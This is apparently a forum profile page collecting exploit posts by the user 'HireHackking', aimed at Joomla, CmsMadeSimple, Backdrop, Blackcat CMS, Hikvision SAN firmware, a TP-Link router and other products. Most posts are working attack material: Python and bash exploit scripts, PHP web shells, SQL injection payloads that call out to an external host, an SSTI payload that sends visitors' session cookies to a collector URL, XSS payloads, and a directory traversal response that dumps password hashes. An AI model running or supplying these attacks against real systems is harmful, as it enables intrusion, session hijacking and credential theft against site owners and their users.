Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration) # Google Dork: inurl:"index.php?option=com_booking" # Date: 07/12/2023 # Exploit Author: qw3rTyTy # Vendor Homepage: http://www.artio.net/ # Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download # Version: 2.4.9 # Tested on: Slackware/Nginx/Joomla! 3.10.11 # ## # File: site/booking.php # # <?php # [...] #18 include_once (JPATH_COMPONENT_ADMINISTRATOR . DS . 'booking.php'); # [...] # # File: admin/booking.php # # <?php # [...] #104 if (class_exists(($classname = AImporter::controller()))) { #105 $controller = new $classname(); #106 /* @var $controller JController */ #107 $controller->execute(JRequest::getVar('task')); #108 $controller->redirect(); #109 } # [...] # # File: admin/controllers/customer.php # # <?php # [...] #240 function getUserData() { #241 $user = JFactory::getUser(JRequest::getInt('id')); #242 $data = array('name' => $user->name, 'username' => $user->username, 'email' => $user->email); #243 die(json_encode($data)); #244 } # [...] # # A following GET request is equivalent to doing a query like 'SELECT name, username, email FROM abcde_users WHERE id=123'. # # curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123 # # So, an attacker can easily enumerate all accounts by bruteforcing. # ## import argparse import urllib.parse import requests from sys import exit from time import sleep def enumerateAccounts(options): i = 1 url = options.url url = url + "/index.php?option=com_booking&controller=customer&task=getUserData&id=" while True: try: response = requests.get("{}{}".format(url, str(i))) if response.status_code == 200: try: jsondocument = response.json() if jsondocument["name"] != None: print(jsondocument) except requests.exceptions.JSONDecodeError: raise else: break except Exception as ex: print(ex) break i += 1 def main(): p = argparse.ArgumentParser() p.add_argument("-u", "--url", type=str, required=True) parsed = p.parse_args() try: t = urllib.parse.urlparse(parsed.url) except ValueError as ex: print(ex) exit() if not t[0].startswith("http") and not t[0].startswith("https"): print("Improper URL given.") exit() if len(t[1]) == 0: print("Improper URL given.") exit() enumerateAccounts(parsed) if __name__ == "__main__": main()
  2. HireHackking

    Online Piggery Management System v1.0 - unauthenticated file upload vulnerability

    HireHackking posted a blog entry in Hacker Technology
    #!/bin/bash # Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability # Date: July 12 2023 # Exploit Author: 1337kid # Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html # Version: 1.0 # Tested on: Ubuntu # CVE : CVE-2023-37629 # # chmod +x exploit.sh # ./exploit.sh web_url # ./exploit.sh http://127.0.0.1:8080/ echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ " echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\" echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /" echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ " echo " @1337kid" echo if [[ $1 == '' ]]; then echo "No URL specified!" exit fi base_url=$1 unauth_file_upload() { # CVE-2023-37629 - File upload vuln echo "Generating shell.php" #=========== cat > shell.php << EOF <?php system(\$_GET['cmd']); ?> EOF #=========== echo "done" curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}') if [[ $req == "200" ]]; then echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php" else echo "Failed to upload a shell" fi } req=$(curl -I -s $base_url | head -1 | awk '{print $2}') if [[ $req -eq "200" ]]; then unauth_file_upload else echo "Error" echo "Status Code: $req" fi
  3. HireHackking

    Vaidya-Mitra 1.0 - Multiple SQLi

    HireHackking posted a blog entry in Hacker Technology
    ## Title: Vaidya-Mitra 1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 07.12.2023 ## Vendor: https://mayurik.com/ ## Software: free: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html, https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `useremail` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+' was submitted in the useremail parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker easily can steal all information from this system, like login credentials, phone numbers and etc. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: useremail (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' RLIKE (SELECT (CASE WHEN (5532=5532) THEN 0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+'' ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT (ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gHln'='gHln&userpassword=rootadmin Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND 'ZWBa'='ZWBa&userpassword=rootadmin --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html) ## Time spend: 00:27:00
  4. HireHackking

    CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI) #Application: CmsMadeSimple #Version: v2.2.17 #Bugs: SSTI #Technology: PHP #Vendor URL: https://www.cmsmadesimple.org/ #Software Link: https://www.cmsmadesimple.org/downloads/cmsms #Date of found: 13-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== Steps: 1. Login to test user account 2. Go to Content Manager 3. Add New Content 4. set as ''' {$smarty.version} {{7*7}} {$smarty.now} {$smarty.template} <img src=YOU-SERVER/{$smarty.cookies.CMSSESSID852a6e69ca02}> <img src=YOU-SERVER/{$smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1}> <img src=YOU_SERVER/{$smarty.cookies.__c}> ''' to conten_en section. 5.If any user visit to page, Hacker hijack all cookie payload: %3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E POC Request POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=1c2c31a1c1bff4819cd&;m1_content_id=81&showtemplate=false HTTP/1.1 Host: localhost Content-Length: 988 sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CMSSESSID852a6e69ca02=bq83g023otkn4s745acdnvbnu4; 34a3083b62a225efa0bc6b5b43335d226264c2c1=1e91865ac5c59e34f8dc1ddb6fd168a61246751d%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjoyLCJlZmZfdXNlcm5hbWUiOiJ0ZXN0IiwiaGFzaCI6IiQyeSQxMCRDQlwvWEIyNEpsWmhJNjhKQ29LcWplZXgyOUVXRDRGN2E1MTNIdUo2c3VXMUd1V3NKRTBNcEMifQ%3D%3D; __c=1c2c31a1c1bff4819cd Connection: close mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=1c2c31a1c1bff4819cd&m1_content_id=81&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E&menutext=test&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=&pagedata=&design_id=2&template_id=10&alias=test&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&ownerid=1&additional_editors=&m1_ajax=1&m1_apply=1 Poc Video: https://youtu.be/zq3u3jRpfqM
  5. HireHackking

    Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) #Application: Backdrop Cms #Version: v1.25.1 #Bugs: Stored Xss #Technology: PHP #Vendor URL: https://backdropcms.org/ #Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip #Date of found: 12-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== 1. login to account 2. go to http://localhost/backdrop/?q=admin/config/system/site-information 3. upload svg file """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ 4. go to svg file (http://localhost/backdrop/files/malas_2.svg) Request POST /backdrop/?q=admin/config/system/site-information HTTP/1.1 Host: localhost Content-Length: 2116 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/backdrop/?q=admin/config/system/site-information Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E Connection: close ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_name" My Backdrop Site ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_slogan" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_mail" admin@admin.com ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_logo_path" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="files[site_favicon_upload]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_favicon_path" core/misc/favicon.ico ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_frontpage" home ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_403" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_404" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_build_id" form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_token" siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40 ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_id" system_site_information_settings ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="op" Save configuration ------WebKitForm
  6. HireHackking

    Blackcat Cms v1.4 - Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Blackcat Cms v1.4 - Stored XSS Application: blackcat Cms Version: v1.4 Bugs: Stored XSS Technology: PHP Vendor URL: https://blackcat-cms.org/ Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS Date of found: 13.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account 2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1) 3. set as <img src=x onerror=alert(4)> 4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1
  7. HireHackking

    ABB FlowX v4.00 - Exposure of Sensitive Information

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information # Date: 2023-03-31 # Exploit Author: Paul Smith # Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series # Version: ABB Flow-X all versions before V4.00 # Tested on: Kali Linux # CVE: CVE-2023-1258 #!/usr/bin/python import sys import re from bs4 import BeautifulSoup as BS import lxml import requests # Set the request parameter url = sys.argv[1] def dump_users(): response = requests.get(url) # Check for HTTP codes other than 200 if response.status_code != 200: print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text) exit() # Decode the xml response into dictionary and use the data data = response.text soup = BS(data, features="xml") logs = soup.find_all("log") for log in logs: test = re.search('User (.*?) logged in',str(log)) if test: print(test.group(0)) def main(): dump_users() if __name__ == '__main__': main()
  8. HireHackking

    CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE) #Application: CmsMadeSimple #Version: v2.2.17 #Bugs: Remote Code Execution(RCE) #Technology: PHP #Vendor URL: https://www.cmsmadesimple.org/ #Software Link: https://www.cmsmadesimple.org/downloads/cmsms #Date of found: 12-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux import requests login_url = 'http://localhost/admin/login.php' username=input('username = ') password=input('password = ') upload_url = 'http://localhost/admin/moduleinterface.php' file_path = input("please phar file name but file must same directory with python file and file content : <?php echo system('cat /etc/passwd') ?> : ") #phar file content """"<?php echo system('cat /etc/passwd') ?>""""" login_data = { 'username': username, 'password': password, 'loginsubmit': 'Submit' } session = requests.Session() response = session.post(login_url, data=login_data) if response.status_code == 200: print('Login account') else: print('Login promlem.') exit() files = { 'm1_files[]': open(file_path, 'rb') } data = { 'mact': 'FileManager,m1_,upload,0', '__c': session.cookies['__c'], 'disable_buffer': '1' } response = session.post(upload_url, files=files, data=data) if response.status_code == 200: print('file upload') rce_url=f"http://localhost/uploads/{file_path}" rce=requests.get(rce_url) print(rce.text) else: print('file not upload')
  9. HireHackking

    Statamic 4.7.0 - File-Inclusion

    HireHackking posted a blog entry in Hacker Technology
    ## Title: Statamic 4.7.0 - File-Inclusion ## Author: nu11secur1ty ## Date: 07.13.2023 ## Vendor: https://statamic.com/ ## Software: https://demo.statamic.com/ ## Reference: https://portswigger.net/web-security/file-upload ## Description: The statamic-4.7.0 suffers from file inclusion - file upload vulnerability. The attacker can upload a malicious HTML file and can share the malicious URL which uses the infected HTML file to the other attackers in the network, they easily can look at the token session key and can do very dangerous stuff. ## Staus: HIGH Vulnerability [+]Exploit: ```js <html> <script> alert(document.cookie); </script> </html> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/statamic/2023/statamic-4.7.0) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/07/statamic-470-file-inclusion-unsanitized.html) ## Time spend: 01:10:00
  10. HireHackking

    CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS) #Application: CmsMadeSimple #Version: v2.2.17 #Bugs: Stored Xss #Technology: PHP #Vendor URL: https://www.cmsmadesimple.org/ #Software Link: https://www.cmsmadesimple.org/downloads/cmsms #Date of found: 12-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Login to account 2. Go to Content Manager 3. Add New Content 4. Type as '<img src=x onerror=alert(document.cookie)>' to metadata section payload: <img src=x onerror=alert(document.cookie)> 5. Submit Content 6. Visit Content (http://localhost/index.php?page=test) Request: POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1 Host: localhost Content-Length: 584 sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6 Connection: close mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1
  11. HireHackking

    Blackcat Cms v1.4 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE) Application: blackcat Cms Version: v1.4 Bugs: RCE Technology: PHP Vendor URL: https://blackcat-cms.org/ Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS Date of found: 13.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account as admin 2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr) 3. upload zip file but this zip file must contains poc.php poc.php file contents <?php $a=$_GET['code']; echo system($a);?> 4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd Poc request POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1 Host: localhost Content-Length: 577 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti Connection: close ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="upload" 1 ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="userfile"; filename="poc.zip" Content-Type: application/zip PKvalsdalsfapoc.php<?php $a=$_GET['code']; echo system($a); ?> blabalaboalpoc.php blablabla ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="submit" Upload ------WebKitFormBoundaryBRByJwW3CUSHOcBT--
  12. HireHackking

    Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution # Date: 16 July 2023 # Exploit Author: Thurein Soe # CVE : CVE-2022-28171 # Vendor Homepage: https://www.hikvision.com # Software Link: N/A # Refence Link: https://cve.report/CVE-2022-28171 # Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s ''' Vendor Description: Hikvision is a world-leading surveillance manufacturer and supplier of video surveillance and Internet of Things (IoT) equipment for civilian and military purposes. Some Hikvision Hybrid SAN products were vulnerable to multiple remote code execution vulnerabilities such as command injection, Blind SQL injection, HTTP request smuggling, and reflected cross-site scripting. This resulted in remote code execution that allows an adversary to execute arbitrary operating system commands and more. However, an adversary must be on the same network to leverage this vulnerability to execute arbitrary commands. Vulnerability description: A manual test confirmed that The download type parameter was vulnerable to Blind SQL injection.I created a Python script to automate and enumerate SQL versions as the Application was behind the firewall and block all the requests from SQLmap. Request Body: GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1 Host: X.X.X.X.12:2004 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Connection: close POC: ''' import requests import time url = "http://X.X.X.X:2004/web/log/dynamic_log.php" # Function to check if the response time is greater than the specified delay def is_response_time_delayed(response_time, delay): return response_time >= delay # Function to perform blind SQL injection and check the response time def perform_blind_sql_injection(payload): proxies = { 'http': 'http://localhost:8080', 'https': 'http://localhost:8080', } params = { 'target': 'makeMaintainLog', 'downloadtype': payload } headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36', 'Connection': 'close' } start_time = time.time() response = requests.get(url, headers=headers, params=params, proxies=proxies) end_time = time.time() response_time = end_time - start_time return is_response_time_delayed(response_time, 20) # Enumerate the MySQL version def enumerate_mysql_version(): version_Name = '' sleep_time = 10 # Sleep time is 10 seconds payloads = [ f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid}, SLEEP({sleep_time}), 0))-- -" for i in range(1, 11) for mid in range(256) ] for payload in payloads: if perform_blind_sql_injection(payload): mid = payload.split("=")[-1].split(",")[0] version_Name += chr(int(mid)) return version_Name # Enumeration is completed version_Name = enumerate_mysql_version() print("MySQL version is:", version_Name)
  13. HireHackking

    TP-Link TL-WR740N - Authenticated Directory Transversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal # Date: 13/7/2023 # Exploit Author: Anish Feroz (Zeroxinn) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N ---------------------------POC--------------------------- Request ------- GET /help/../../../etc/shadow HTTP/1.1 Host: 192.168.0.1:8082 Authorization: Basic YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Response -------- HTTP/1.1 200 OK Server: Router Webserver Connection: close WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" Content-Type: text/html <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> <HTML> <HEAD><TITLE>TL-WR740N</TITLE> <META http-equiv=Pragma content=no-cache> <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"> <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"> <SCRIPT language="javascript" type="text/javascript"><!-- if(window.parent == window){window.location.href="http://192.168.0.1";} function Click(){ return false;} document.oncontextmenu=Click; function doPrev(){history.go(-1);} //--></SCRIPT> root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: bin::10933:0:99999:7::: daemon::10933:0:99999:7::: adm::10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody::10933:0:99999:7::: ap71::10933:0:99999:7:::
  14. HireHackking

    Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.

    HireHackking posted a blog entry in Hacker Technology
